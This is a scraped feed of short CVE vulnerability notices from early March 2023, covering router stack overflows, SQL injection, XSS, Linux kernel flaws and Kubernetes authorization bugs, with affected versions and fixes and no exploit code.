🚨 CVE-2023-24132Jensen of Scandinavia Eagle 1200AC V15.03.06.33_en was discovered to contain a stack overflow via the wepkey3_5g parameter at /goform/WifiBasicSet.🎖@cveNotify |
|
| 2023-03-01 22:29:59 |
🚨 CVE-2023-24133Jensen of Scandinavia Eagle 1200AC V15.03.06.33_en was discovered to contain a stack overflow via the wepkey_5g parameter at /goform/WifiBasicSet.🎖@cveNotify |
|
| 2023-03-01 22:29:57 |
🚨 CVE-2023-24134Jensen of Scandinavia Eagle 1200AC V15.03.06.33_en was discovered to contain a stack overflow via the wepkey3 parameter at /goform/WifiBasicSet.🎖@cveNotify |
|
| 2023-03-01 22:29:56 |
🚨 CVE-2022-3162Users authorized to list or watch one type of namespaced custom resource cluster-wide can read custom resources of a different type in the same API group without authorization. Clusters are impacted by this vulnerability if all of the following are true: 1. There are 2+ CustomResourceDefinitions sharing the same API group 2. Users have cluster-wide list or watch authorization on one of those custom resources. 3. The same users are not authorized to read another custom resource in the same API group.🎖@cveNotify |
|
| 2023-03-01 22:29:55 |
🚨 CVE-2022-3294Users may have access to secure endpoints in the control plane network. Kubernetes clusters are only affected if an untrusted user can modify Node objects and send proxy requests to them. Kubernetes supports node proxying, which allows clients of kube-apiserver to access endpoints of a Kubelet to establish connections to Pods, retrieve container logs, and more. While Kubernetes already validates the proxying address for Nodes, a bug in kube-apiserver made it possible to bypass this validation. Bypassing this validation could allow authenticated requests destined for Nodes to to the API server's private network.🎖@cveNotify |
|
| 2023-03-01 22:29:53 |
🚨 CVE-2022-48309A CSRF vulnerability allows malicious websites to retrieve logs and technical support archives in Sophos Connect versions older than 2.2.90.🎖@cveNotify |
|
| 2023-03-01 22:29:52 |
🚨 CVE-2022-48310An information disclosure vulnerability allows sensitive key material to be included in technical support archives in Sophos Connect versions older than 2.2.90.🎖@cveNotify |
|
| 2023-03-01 22:29:51 |
🚨 CVE-2022-4901Multiple stored XSS vulnerabilities in Sophos Connect versions older than 2.2.90 allow Javascript code to run in the local UI via a malicious VPN configuration that must be manually loaded by the victim.🎖@cveNotify |
|
| 2023-03-01 22:29:49 |
🚨 CVE-2023-1127Divide By Zero in GitHub repository vim/vim prior to 9.0.1367.🎖@cveNotify |
|
| 2023-03-01 22:29:48 |
🚨 CVE-2023-23000In the Linux kernel before 5.17, drivers/phy/tegra/xusb.c mishandles the tegra_xusb_find_port_node return value. Callers expect NULL in the error case, but an error pointer is used.🎖@cveNotify |
|
| 2023-03-01 22:29:46 |
🚨 CVE-2023-1097Baicells EG7035-M11 devices with firmware through BCE-ODU-1.0.8 are vulnerable to improper code exploitation via HTTP GET command injections. Commands are executed using pre-login execution and executed with root permissions. The following methods have been tested and validated by a 3rd party analyst and have been confirmed exploitable special thanks to Lionel Musonza for the discovery.🎖@cveNotify |
|
| 2023-03-01 22:29:45 |
🚨 CVE-2022-34864Out-of-bounds read in the Intel(R) Trace Analyzer and Collector software before version 2021.5 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-03-01 22:29:43 |
🚨 CVE-2022-1652Linux Kernel could allow a local attacker to execute arbitrary code on the system, caused by a concurrency use-after-free flaw in the bad_flp_intr function. By executing a specially-crafted program, an attacker could exploit this vulnerability to execute arbitrary code or cause a denial of service condition on the system.🎖@cveNotify |
|
| 2023-03-01 22:29:41 |
🚨 CVE-2022-1786A use-after-free flaw was found in the Linux kernel’s io_uring subsystem in the way a user sets up a ring with IORING_SETUP_IOPOLL with more than one task completing submissions on this ring. This flaw allows a local user to crash or escalate their privileges on the system.🎖@cveNotify |
|
| 2023-03-01 22:29:40 |
🚨 CVE-2022-0995An out-of-bounds (OOB) memory write flaw was found in the Linux kernel’s watch_queue event notification subsystem. This flaw can overwrite parts of the kernel state, potentially allowing a local user to gain privileged access or cause a denial of service on the system.🎖@cveNotify |
|
| 2023-03-01 22:29:39 |
🚨 CVE-2022-0998An integer overflow flaw was found in the Linux kernel’s virtio device driver code in the way a user triggers the vhost_vdpa_config_validate function. This flaw allows a local user to crash or potentially escalate their privileges on the system.🎖@cveNotify |
|
| 2023-03-01 22:29:37 |
🚨 CVE-2022-0500A flaw was found in unrestricted eBPF usage by the BPF_BTF_LOAD, leading to a possible out-of-bounds memory write in the Linux kernel’s BPF subsystem due to the way a user loads BTF. This flaw allows a local user to crash or escalate their privileges on the system.🎖@cveNotify |
|
| 2023-03-01 20:30:07 |
🚨 CVE-2020-15175In GLPI before version 9.5.2, the `?pluginimage.send.php?` endpoint allows a user to specify an image from a plugin. The parameters can be maliciously crafted to instead delete the .htaccess file for the files directory. Any user becomes able to read all the files and folders contained in “/files/”. Some of the sensitive information that is compromised are the user sessions, logs, and more. An attacker would be able to get the Administrators session token and use that to authenticate. The issue is patched in version 9.5.2.🎖@cveNotify |
|
| 2023-03-01 20:30:06 |
🚨 CVE-2020-5421In Spring Framework versions 5.2.0 - 5.2.8, 5.1.0 - 5.1.17, 5.0.0 - 5.0.18, 4.3.0 - 4.3.28, and older unsupported versions, the protections against RFD attacks from CVE-2015-5211 may be bypassed depending on the browser used through the use of a jsessionid path parameter.🎖@cveNotify |
|
| 2023-03-01 20:30:05 |
🚨 CVE-2015-5361Background For regular, unencrypted FTP traffic, the FTP ALG can inspect the unencrypted control channel and open related sessions for the FTP data channel. These related sessions (gates) are specific to source and destination IPs and ports of client and server. The design intent of the ftps-extensions option (which is disabled by default) is to provide similar functionality when the SRX secures the FTP/FTPS client. As the control channel is encrypted, the FTP ALG cannot inspect the port specific information and will open a wider TCP data channel (gate) from client IP to server IP on all destination TCP ports. In FTP/FTPS client environments to an enterprise network or the Internet, this is the desired behavior as it allows firewall policy to be written to FTP/FTPS servers on well-known control ports without using a policy with destination IP ANY and destination port ANY. Issue The ftps-extensions option is not intended or recommended where the SRX secures the FTPS server, as the wide data channel session (gate) will allow the FTPS client temporary access to all TCP ports on the FTPS server. The data session is associated to the control channel and will be closed when the control channel session closes. Depending on the configuration of the FTPS server, supporting load-balancer, and SRX inactivity-timeout values, the server/load-balancer and SRX may keep the control channel open for an extended period of time, allowing an FTPS client access for an equal duration.? Note that the ftps-extensions option is not enabled by default.🎖@cveNotify |
|
| 2023-03-01 20:30:04 |
🚨 CVE-2022-3594A vulnerability was found in Linux Kernel. It has been declared as problematic. Affected by this vulnerability is the function intr_callback of the file drivers/net/usb/r8152.c of the component BPF. The manipulation leads to logging of excessive data. The attack can be launched remotely. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211363.🎖@cveNotify |
|
| 2023-03-01 20:30:03 |
🚨 CVE-2018-19615Rockwell Automation Allen-Bradley PowerMonitor 1000 all versions. A remote attacker could inject arbitrary code into a targeted userâ??s web browser to gain access to the affected device.🎖@cveNotify |
|
| 2023-03-01 20:29:58 |
🚨 CVE-2020-5511PHPGurukul Small CRM v2.0 was found vulnerable to authentication bypass via SQL injection when logging into the administrator login page.🎖@cveNotify |
|
| 2023-03-01 20:29:57 |
🚨 CVE-2019-10433Jenkins Dingding[??] Plugin stores credentials unencrypted in job config.xml files on the Jenkins master where they can be viewed by users with Extended Read permission, or access to the master file system.🎖@cveNotify |
|
| 2023-03-01 20:29:56 |
🚨 CVE-2019-1566The PAN-OS management web interface in PAN-OS 7.1.21 and earlier, PAN-OS 8.0.14 and earlier, and PAN-OS 8.1.5 and earlier, may allow an unauthenticated attacker to inject arbitrary JavaScript or HTML.🎖@cveNotify |
|
| 2023-03-01 20:29:55 |
🚨 CVE-2019-11119Insufficient session validation in the service API for Intel(R) RWC3 version 4.186 and before may allow an unauthenticated user to potentially enable escalation of privilege via network access.🎖@cveNotify |
|
| 2023-03-01 20:29:51 |
🚨 CVE-2022-40232IBM Sterling B2B Integrator Standard Edition 6.1.0.0 through 6.1.1.1, and 6.1.2.0 could allow an authenticated user to perform actions they should not have access to due to improper permission controls. IBM X-Force ID: 235597.🎖@cveNotify |
|
| 2023-03-01 20:29:50 |
🚨 CVE-2021-32848Octobox is software for managing GitHub notifications. Prior to pull request (PR) 2807, a user of the system can provide a specifically crafted search query string that will trigger a ReDoS vulnerability. This issue is fixed in PR 2807.🎖@cveNotify |
|
| 2023-03-01 20:29:49 |
🚨 CVE-2023-0460The YouTube Embedded 1.2 SDK binds to a service within the YouTube Main App. After binding, a remote context is created with the flags Context.CONTEXT_INCLUDE_CODE | Context.CONTEXT_IGNORE_SECURITY. This allows the client app to remotely load code from YouTube Main App by retrieving the Main App’s ClassLoader. A potential vulnerability in the binding logic used by the client SDK where the SDK ends up calling bindService() on a malicious app rather than YT Main App. This creates a vulnerability where the SDK can load the malicious app’s ClassLoader instead, allowing the malicious app to load arbitrary code into the calling app whenever the embedded SDK is invoked. In order to trigger this vulnerability, an attacker must masquerade the Youtube app and install it on a device, have a second app that uses the Embedded player and typically distribute both to the victim outside of the Play Store.🎖@cveNotify |
|
| 2023-03-01 20:29:48 |
🚨 CVE-2022-30632Uncontrolled recursion in Glob in path/filepath before Go 1.17.12 and Go 1.18.4 allows an attacker to cause a panic due to stack exhaustion via a path containing a large number of path separators.🎖@cveNotify |
|
| 2023-03-01 20:29:44 |
🚨 CVE-2022-30633Uncontrolled recursion in Unmarshal in encoding/xml before Go 1.17.12 and Go 1.18.4 allows an attacker to cause a panic due to stack exhaustion via unmarshalling an XML document into a Go struct which has a nested field that uses the 'any' field tag.🎖@cveNotify |
|
| 2023-03-01 20:29:43 |
🚨 CVE-2019-6116In Artifex Ghostscript through 9.26, ephemeral or transient procedures can allow access to system operators, leading to remote code execution.🎖@cveNotify |
|
| 2023-03-01 20:29:42 |
🚨 CVE-2019-6128The TIFFFdOpen function in tif_unix.c in LibTIFF 4.0.10 has a memory leak, as demonstrated by pal2rgb.🎖@cveNotify |
|
| 2023-03-01 20:29:41 |
🚨 CVE-2022-30631Uncontrolled recursion in Reader.Read in compress/gzip before Go 1.17.12 and Go 1.18.4 allows an attacker to cause a panic due to stack exhaustion via an archive containing a large number of concatenated 0-length compressed files.🎖@cveNotify |
|
| 2023-03-01 15:29:43 |
🚨 CVE-2023-1115Cross-site Scripting (XSS) - Stored in GitHub repository pimcore/pimcore prior to 10.5.18.🎖@cveNotify |
|
| 2023-03-01 15:29:42 |
🚨 CVE-2023-1116Cross-site Scripting (XSS) - Stored in GitHub repository pimcore/pimcore prior to 10.5.18.🎖@cveNotify |
|
| 2023-03-01 15:29:41 |
🚨 CVE-2023-1117Cross-site Scripting (XSS) - Stored in GitHub repository pimcore/pimcore prior to 10.5.18.🎖@cveNotify |
|
| 2023-03-01 15:29:40 |
🚨 CVE-2021-34164Permissions vulnerability in LIZHIFAKA v.2.2.0 allows authenticated attacker to execute arbitrary commands via the set password function in the admin/index/email location.🎖@cveNotify |
|
| 2023-03-01 15:29:39 |
🚨 CVE-2021-46853Alpine before 2.25 allows remote attackers to cause a denial of service (application crash) when LIST or LSUB is sent before STARTTLS.🎖@cveNotify |
|
| 2023-03-01 15:29:38 |
🚨 CVE-2022-39353xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) `DOMParser` and `XMLSerializer` module. xmldom parses XML that is not well-formed because it contains multiple top level elements, and adds all root nodes to the `childNodes` collection of the `Document`, without reporting any error or throwing. This breaks the assumption that there is only a single root node in the tree, which led to issuance of CVE-2022-39299 as it is a potential issue for dependents. Update to @xmldom/xmldom@~0.7.7, @xmldom/xmldom@~0.8.4 (dist-tag latest) or @xmldom/xmldom@>=0.9.0-beta.4 (dist-tag next). As a workaround, please one of the following approaches depending on your use case: instead of searching for elements in the whole DOM, only search in the `documentElement`or reject a document with a document that has more then 1 `childNode`.🎖@cveNotify |
|
| 2023-03-01 07:30:11 |
🚨 CVE-2022-4564A vulnerability classified as problematic has been found in University of Central Florida Materia up to 9.0.0. This affects the function before of the file fuel/app/classes/controller/api.php of the component API Controller. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely. Upgrading to version 9.0.1-alpha1 is able to address this issue. The name of the patch is af259115d2e8f17068e61902151ee8a9dbac397b. It is recommended to upgrade the affected component. The identifier VDB-215973 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-01 07:30:10 |
🚨 CVE-2017-18559The cforms2 plugin before 14.13.3 for WordPress has multiple XSS issues.🎖@cveNotify |
|
| 2023-03-01 07:30:09 |
🚨 CVE-2015-9297The events-manager plugin before 5.6 for WordPress has XSS.🎖@cveNotify |
|
| 2023-03-01 07:30:08 |
🚨 CVE-2022-4560A vulnerability was found in Joget up to 7.0.31. It has been rated as problematic. This issue affects the function getInternalJsCssLib of the file wflow-core/src/main/java/org/joget/plugin/enterprise/UniversalTheme.java of the component wflow-core. The manipulation of the argument key leads to cross site scripting. The attack may be initiated remotely. Upgrading to version 7.0.32 is able to address this issue. The name of the patch is ecf8be8f6f0cb725c18536ddc726d42a11bdaa1b. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-215963.🎖@cveNotify |
|
| 2023-03-01 07:30:07 |
🚨 CVE-2022-4525A vulnerability has been found in National Sleep Research Resource sleepdata.org up to 58.x and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely. Upgrading to version 59.0.0.rc is able to address this issue. The name of the patch is da44a3893b407087829b006d09339780919714cd. It is recommended to upgrade the affected component. The identifier VDB-215905 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-01 07:30:02 |
🚨 CVE-2022-4524A vulnerability, which was classified as problematic, was found in Roots soil Plugin up to 4.0.x. Affected is the function language_attributes of the file src/Modules/CleanUpModule.php. The manipulation of the argument language leads to cross site scripting. It is possible to launch the attack remotely. Upgrading to version 4.1.0 is able to address this issue. The name of the patch is 0c9151e00ab047da253e5cdbfccb204dd423269d. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-215904.🎖@cveNotify |
|
| 2023-03-01 07:30:01 |
🚨 CVE-2014-10377The cforms2 plugin before 13.2 for WordPress has XSS in lib_ajax.php.🎖@cveNotify |
|
| 2023-03-01 07:30:00 |
🚨 CVE-2016-10884The simple-membership plugin before 3.3.3 for WordPress has multiple CSRF issues.🎖@cveNotify |
|
| 2023-03-01 07:29:59 |
🚨 CVE-2015-9308The wp-google-map-plugin plugin before 2.3.10 for WordPress has CSRF in the add/edit map feature.🎖@cveNotify |
|
| 2023-03-01 07:29:55 |
🚨 CVE-2015-9307The wp-google-map-plugin plugin before 2.3.10 for WordPress has CSRF in the add/edit location feature.🎖@cveNotify |
|
| 2023-03-01 07:29:53 |
🚨 CVE-2022-45378** UNSUPPPORTED WHEN ASSIGNED **In the default configuration of Apache SOAP, an RPCRouterServlet is available without authentication. This gives an attacker the possibility to invoke methods on the classpath that meet certain criteria. Depending on what classes are available on the classpath this might even lead to arbitrary remote code execution. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2023-03-01 07:29:52 |
🚨 CVE-2017-1002157modulemd 1.3.1 and earlier uses an unsafe function for processing externally provided data, leading to remote code execution.🎖@cveNotify |
|
| 2023-03-01 07:29:51 |
🚨 CVE-2017-1002152Bodhi 2.9.0 and lower is vulnerable to cross-site scripting resulting in code injection caused by incorrect validation of bug titles.🎖@cveNotify |
|
| 2023-03-01 07:29:47 |
🚨 CVE-2023-1103Cross-site Scripting (XSS) - Stored in GitHub repository flatpressblog/flatpress prior to 1.3.🎖@cveNotify |
|
| 2023-03-01 07:29:46 |
🚨 CVE-2023-1104Cross-site Scripting (XSS) - Stored in GitHub repository flatpressblog/flatpress prior to 1.3.🎖@cveNotify |
|
| 2023-03-01 07:29:45 |
🚨 CVE-2023-1105External Control of File Name or Path in GitHub repository flatpressblog/flatpress prior to 1.3.🎖@cveNotify |
|
| 2023-03-01 07:29:44 |
🚨 CVE-2022-38725An integer overflow in the RFC3164 parser in One Identity syslog-ng 3.0 through 3.37 allows remote attackers to cause a Denial of Service via crafted syslog input that is mishandled by the tcp or network function. syslog-ng Premium Edition 7.0.30 and syslog-ng Store Box 6.10.0 are also affected.🎖@cveNotify |
|
| 2023-03-01 07:29:43 |
🚨 CVE-2021-25298Nagios XI version xi-5.7.5 is affected by OS command injection. The vulnerability exists in the file /usr/local/nagiosxi/html/includes/configwizards/cloud-vm/cloud-vm.inc.php due to improper sanitization of authenticated user-controlled input by a single HTTP request, which can lead to OS command injection on the Nagios XI server.🎖@cveNotify |
|
| 2023-03-01 02:30:05 |
🚨 CVE-2023-1059A vulnerability classified as critical was found in SourceCodester Doctors Appointment System 1.0. This vulnerability affects unknown code of the file /admin/doctors.php of the component Parameter Handler. The manipulation of the argument search leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-221824.🎖@cveNotify |
|
| 2023-03-01 02:30:03 |
🚨 CVE-2023-1067Cross-site Scripting (XSS) - Stored in GitHub repository pimcore/pimcore prior to 10.5.18.🎖@cveNotify |
|
| 2023-03-01 02:30:02 |
🚨 CVE-2023-24364Simple Customer Relationship Management System v1.0 was discovered to contain a SQL injection vulnerability via the username parameter under the Admin Panel.🎖@cveNotify |
|
| 2023-03-01 02:30:00 |
🚨 CVE-2023-24651Simple Customer Relationship Management System v1.0 was discovered to contain a SQL injection vulnerability via the name parameter on the registration page.🎖@cveNotify |
|
| 2023-03-01 02:29:59 |
🚨 CVE-2023-24652Simple Customer Relationship Management System v1.0 was discovered to contain a SQL injection vulnerability via the Description parameter under the Create ticket function.🎖@cveNotify |
|
| 2023-03-01 02:29:57 |
🚨 CVE-2023-24653Simple Customer Relationship Management System v1.0 was discovered to contain a SQL injection vulnerability via the oldpass parameter under the Change Password function.🎖@cveNotify |
|
| 2023-03-01 02:29:56 |
🚨 CVE-2023-24654Simple Customer Relationship Management System v1.0 was discovered to contain a SQL injection vulnerability via the name parameter under the Request a Quote function.🎖@cveNotify |
|
| 2023-03-01 02:29:54 |
🚨 CVE-2023-24656Simple Customer Relationship Management System v1.0 was discovered to contain a SQL injection vulnerability via the subject parameter under the Create Ticket function.🎖@cveNotify |
|
| 2023-03-01 02:29:53 |
🚨 CVE-2022-38220An XSS vulnerability exists within Quest KACE Systems Management Appliance (SMA) through 12.1 that may allow remote injection of arbitrary web script or HTML.🎖@cveNotify |
|
| 2023-03-01 02:29:51 |
🚨 CVE-2023-0847The Sub-IoT implementation of the DASH 7 Alliance protocol has a vulnerability that can lead to an out-of-bounds write prior to implementation version 0.5.0. If the protocol has been compiled using default settings, this will only grant the attacker access to allocated but unused memory. However, if it was configured using non-default settings, there is the possibility that exploiting this vulnerability could lead to system crashes and remote code execution.🎖@cveNotify |
|
| 2023-03-01 02:29:50 |
🚨 CVE-2022-26579PAX A930 device with PayDroid_7.1.1_Virgo_V04.3.26T1_20210419 can allow a root privileged attacker to install unsigned packages. The attacker must have shell access to the device and gain root privileges in order to exploit this vulnerability.🎖@cveNotify |
|
| 2023-03-01 02:29:48 |
🚨 CVE-2022-26580PAX A930 device with PayDroid_7.1.1_Virgo_V04.3.26T1_20210419 can allow the execution of specific command injections on selected binaries in the ADB daemon shell service. The attacker must have physical USB access to the device in order to exploit this vulnerability.🎖@cveNotify |
|
| 2023-03-01 02:29:47 |
🚨 CVE-2022-26581PAX A930 device with PayDroid_7.1.1_Virgo_V04.3.26T1_20210419 can allow an unauthorized attacker to perform privileged actions through the execution of specific binaries listed in ADB daemon. The attacker must have physical USB access to the device in order to exploit this vulnerability.🎖@cveNotify |
|
| 2023-03-01 02:29:45 |
🚨 CVE-2022-26582The systool_server in PAX Technology A930 PayDroid 7.1.1 Virgo V04.4.02 20211201 fails to check for dollar signs or backticks in user supplied commands, leading to to arbitrary command execution as root.🎖@cveNotify |
|
| 2023-03-01 02:29:44 |
🚨 CVE-2022-23239Active IQ Unified Manager for VMware vSphere, Linux, and Microsoft Windows versions prior to 9.11P1 are susceptible to a vulnerability which allows administrative users to perform a Stored Cross-Site Scripting (XSS) attack.🎖@cveNotify |
|
| 2023-03-01 02:29:42 |
🚨 CVE-2022-23240Active IQ Unified Manager for VMware vSphere, Linux, and Microsoft Windows versions prior to 9.11P1 are susceptible to a vulnerability which allows unauthorized users to update EMS Subscriptions via unspecified vectors.🎖@cveNotify |
|
| 2023-03-01 02:29:41 |
🚨 CVE-2022-47075An issue was discovered in Smart Office Web 20.28 and earlier allows attackers to download sensitive information via the action name parameter to ExportEmployeeDetails.aspx, and to ExportReportingManager.aspx.🎖@cveNotify |
|
| 2023-03-01 02:29:39 |
🚨 CVE-2022-47076An issue was discovered in Smart Office Web 20.28 and earlier allows attackers to view sensitive information via DisplayParallelLogData.aspx.🎖@cveNotify |
|
| 2023-03-01 02:29:38 |
🚨 CVE-2023-1095In nf_tables_updtable, if nf_tables_table_enable returns an error, nft_trans_destroy is called to free the transaction object. nft_trans_destroy() calls list_del(), but the transaction was never placed on a list -- the list head is all zeroes, this results in a NULL pointer dereference.🎖@cveNotify |
|
| 2023-03-01 02:29:37 |
🚨 CVE-2023-25575API Platform Core is the server component of API Platform: hypermedia and GraphQL APIs. Resource properties secured with the `security` option of the `ApiPlatform\Metadata\ApiProperty` attribute can be disclosed to unauthorized users. The problem affects most serialization formats, including raw JSON, which is enabled by default when installing API Platform. Custom serialization formats may also be impacted. Only collection endpoints are affected by the issue, item endpoints are not. The JSON-LD format is not affected by the issue. The result of the security rule is only executed for the first item of the collection. The result of the rule is then cached and reused for the next items. This bug can leak data to unauthorized users when the rule depends on the value of a property of the item. This bug can also hide properties that should be displayed to authorized users. This issue impacts the 2.7, 3.0 and 3.1 branches. Please upgrade to versions 2.7.10, 3.0.12 or 3.1.3. As a workaround, replace the `cache_key` of the context array of the Serializer inside a custom normalizer that works on objects if the security option of the `ApiPlatform\Metadata\ApiProperty` attribute is used.🎖@cveNotify |
|
| 2023-03-01 00:29:46 |
🚨 CVE-2022-36537ZK Framework v9.6.1, 9.6.0.1, 9.5.1.3, 9.0.1.2 and 8.6.4.1 allows attackers to access sensitive information via a crafted POST request sent to the component AuUploader.🎖@cveNotify |
|
| 2023-03-01 00:29:45 |
🚨 CVE-2023-1100A vulnerability classified as critical has been found in SourceCodester Online Catering Reservation System 1.0. This affects an unknown part of the file /reservation/add_message.php of the component POST Parameter Handler. The manipulation of the argument fullname leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-222003.🎖@cveNotify |
|
| 2023-03-01 00:29:44 |
🚨 CVE-2023-22996In the Linux kernel before 5.17.2, drivers/soc/qcom/qcom_aoss.c does not release an of_find_device_by_node reference after use, e.g., with put_device.🎖@cveNotify |
|
| 2023-03-01 00:29:41 |
🚨 CVE-2023-22997In the Linux kernel before 6.1.2, kernel/module/decompress.c misinterprets the module_get_next_page return value (expects it to be NULL in the error case, whereas it is actually an error pointer).🎖@cveNotify |
|
| 2023-03-01 00:29:40 |
🚨 CVE-2023-0339Relative Path Traversal vulnerability in ForgeRock Access Management Web Policy Agent allows Authentication Bypass. This issue affects Access Management Web Policy Agent: all versions up to 5.10.1🎖@cveNotify |
|
| 2023-03-01 00:29:39 |
🚨 CVE-2023-0511Relative Path Traversal vulnerability in ForgeRock Access Management Java Policy Agent allows Authentication Bypass. This issue affects Access Management Java Policy Agent: all versions up to 5.10.1🎖@cveNotify |
|
| 2023-02-28 22:30:09 |
🚨 CVE-2023-21593Adobe InDesign versions ID18.1 (and earlier) and ID17.4 (and earlier) are affected by a NULL Pointer Dereference vulnerability. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-02-28 22:30:08 |
🚨 CVE-2018-20822LibSass 3.5.4 allows attackers to cause a denial-of-service (uncontrolled recursion in Sass::Complex_Selector::perform in ast.hpp and Sass::Inspect::operator in inspect.cpp).🎖@cveNotify |
|
| 2023-02-28 22:30:07 |
🚨 CVE-2018-20821The parsing component in LibSass through 3.5.5 allows attackers to cause a denial-of-service (uncontrolled recursion in Sass::Parser::parse_css_variable_value in parser.cpp).🎖@cveNotify |
|
| 2023-02-28 22:30:06 |
🚨 CVE-2019-1010257An Information Disclosure / Data Modification issue exists in article2pdf_getfile.php in the article2pdf Wordpress plugin 0.24, 0.25, 0.26, 0.27. A URL can be constructed which allows overriding the PDF file's path leading to any PDF whose path is known and which is readable to the web server can be downloaded. The file will be deleted after download if the web server has permission to do so. For PHP versions before 5.3, any file can be read by null terminating the string left of the file extension.🎖@cveNotify |
|
| 2023-02-28 22:30:05 |
🚨 CVE-2019-10269BWA (aka Burrow-Wheeler Aligner) before 2019-01-23 has a stack-based buffer overflow in the bns_restore function in bntseq.c via a long sequence name in a .alt file.🎖@cveNotify |
|
| 2023-02-28 22:30:04 |
🚨 CVE-2019-6284In LibSass 3.5.5, a heap-based buffer over-read exists in Sass::Prelexer::alternatives in prelexer.hpp.🎖@cveNotify |
|
| 2023-02-28 22:30:03 |
🚨 CVE-2019-7222The KVM implementation in the Linux kernel through 4.20.5 has an Information Leak.🎖@cveNotify |
|
| 2023-02-28 22:30:01 |
🚨 CVE-2019-7664In elfutils 0.175, a negative-sized memcpy is attempted in elf_cvt_note in libelf/note_xlate.h because of an incorrect overflow check. Crafted elf input causes a segmentation fault, leading to denial of service (program crash).🎖@cveNotify |
|
| 2023-02-28 22:30:00 |
🚨 CVE-2019-6283In LibSass 3.5.5, a heap-based buffer over-read exists in Sass::Prelexer::parenthese_scope in prelexer.hpp.🎖@cveNotify |
|
| 2023-02-28 22:29:59 |
🚨 CVE-2018-20584JasPer 2.0.14 allows remote attackers to cause a denial of service (application hang) via an attempted conversion to the jp2 format.🎖@cveNotify |
|
| 2023-02-28 22:29:55 |
🚨 CVE-2018-1000876binutils version 2.32 and earlier contains a Integer Overflow vulnerability in objdump, bfd_get_dynamic_reloc_upper_bound,bfd_canonicalize_dynamic_reloc that can result in Integer overflow trigger heap overflow. Successful exploitation allows execution of arbitrary code.. This attack appear to be exploitable via Local. This vulnerability appears to have been fixed in after commit 3a551c7a1b80fca579461774860574eabfd7f18f.🎖@cveNotify |
|
| 2023-02-28 22:29:54 |
🚨 CVE-2021-26277The framework service handles pendingIntent incorrectly, allowing a malicious application with certain privileges to perform privileged actions.🎖@cveNotify |
|
| 2023-02-28 22:29:53 |
🚨 CVE-2022-43579IBM Sterling B2B Integrator Standard Edition 6.0.0.0 through 6.0.3.7 and 6.1.0.0 through 6.1.2.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 238684.🎖@cveNotify |
|
| 2023-02-28 22:29:52 |
🚨 CVE-2023-1017An out-of-bounds write vulnerability exists in TPM2.0's Module Library allowing writing of a 2-byte data past the end of TPM2.0 command in the CryptParameterDecryption routine. An attacker who can successfully exploit this vulnerability can lead to denial of service (crashing the TPM chip/process or rendering it unusable) and/or arbitrary code execution in the TPM context.🎖@cveNotify |
|
| 2023-02-28 22:29:51 |
🚨 CVE-2023-1065This vulnerability in the Snyk Kubernetes Monitor can result in irrelevant data being posted to a Snyk Organization, which could in turn obfuscate other, relevant, security issues. It does not expose the user of the integration to any direct security risk and no user data can be leaked. To exploit the vulnerability the attacker does not need to be authenticated to Snyk but does need to know the target's Integration ID (which may or may not be the same as the Organization ID, although this is an unpredictable UUID in either case).🎖@cveNotify |
|
| 2023-02-28 22:29:47 |
🚨 CVE-2023-27371GNU libmicrohttpd before 0.9.76 allows remote DoS (Denial of Service) due to improper parsing of a multipart/form-data boundary in the postprocessor.c MHD_create_post_processor() method. This allows an attacker to remotely send a malicious HTTP POST packet that includes one or more '\0' bytes in a multipart/form-data boundary field, which - assuming a specific heap layout - will result in an out-of-bounds read and a crash in the find_boundary() function.🎖@cveNotify |
|
| 2023-02-28 22:29:46 |
🚨 CVE-2023-27372SPIP before 4.2.1 allows Remote Code Execution via form values in the public area because serialization is mishandled. The fixed versions are 3.2.18, 4.0.10, 4.1.8, and 4.2.1.🎖@cveNotify |
|
| 2023-02-28 22:29:45 |
🚨 CVE-2022-41722A path traversal vulnerability exists in filepath.Clean on Windows. On Windows, the filepath.Clean function could transform an invalid path such as "a/../c:/b" into the valid path "c:\b". This transformation of a relative (if invalid) path into an absolute path could enable a directory traversal attack. After fix, the filepath.Clean function transforms this path into the relative (but still invalid) path ".\c:\b".🎖@cveNotify |
|
| 2023-02-28 22:29:44 |
🚨 CVE-2022-41723A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.🎖@cveNotify |
|
| 2023-02-28 22:29:43 |
🚨 CVE-2022-41724Large handshake records may cause panics in crypto/tls. Both clients and servers may send large TLS handshake records which cause servers and clients, respectively, to panic when attempting to construct responses. This affects all TLS 1.3 clients, TLS 1.2 clients which explicitly enable session resumption (by setting Config.ClientSessionCache to a non-nil value), and TLS 1.3 servers which request client certificates (by setting Config.ClientAuth >= RequestClientCert).🎖@cveNotify |
|
| 2023-02-28 19:30:05 |
🚨 CVE-2020-16093In LemonLDAP::NG (aka lemonldap-ng) through 2.0.8, validity of the X.509 certificate is not checked by default when connecting to remote LDAP backends, because the default configuration of the Net::LDAPS module for Perl is used.🎖@cveNotify |
|
| 2023-02-28 19:30:03 |
🚨 CVE-2020-21676A stack-based buffer overflow in the genpstrx_text() component in genpstricks.c of fig2dev 3.2.7b allows attackers to cause a denial of service (DOS) via converting a xfig file into pstricks format.🎖@cveNotify |
|
| 2023-02-28 19:30:02 |
